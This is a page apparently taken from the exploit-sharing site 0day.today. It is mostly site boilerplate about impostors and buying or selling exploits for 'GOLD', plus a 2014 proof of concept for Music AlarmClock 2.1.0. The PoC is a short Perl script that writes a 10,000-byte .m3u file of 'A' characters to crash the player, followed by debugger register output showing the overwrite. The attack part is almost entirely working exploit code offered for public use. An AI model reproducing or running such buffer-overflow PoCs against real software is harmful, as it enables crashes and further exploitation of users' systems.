0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Music AlarmClock 2.1.0 - (.m3u) Crash PoC
#------------------------------------------------------------------------------------# # Exploit Title: Music AlarmClock 2.1.0 (.m3u) Crash PoC # # Date: Feb 25 2014 # # Exploit Author: Gabor Seljan # # Software Link: http://download.cnet.com/Music-AlarmClock/3000-2350_4-10419263.html # # Version: 2.1.0 # # Tested on: Windows XP SP3 # #------------------------------------------------------------------------------------# # (a10.9e8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=00000000 ecx=7ffdd000 edx=41414161 esi=00153700 edi=0012df10 # eip=7c90100b esp=0012d5c8 ebp=0012d5d0 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 #!/usr/bin/perl use strict; use warnings; my $filename = "poc.m3u"; my $junk = "A" x 10000; open(FILE, ">$filename") || die "[-]Error:\n$!\n"; print FILE $junk; close(FILE); print "Exploit file created successfully [$filename]!\n"; # 0day.today [2024-11-16] #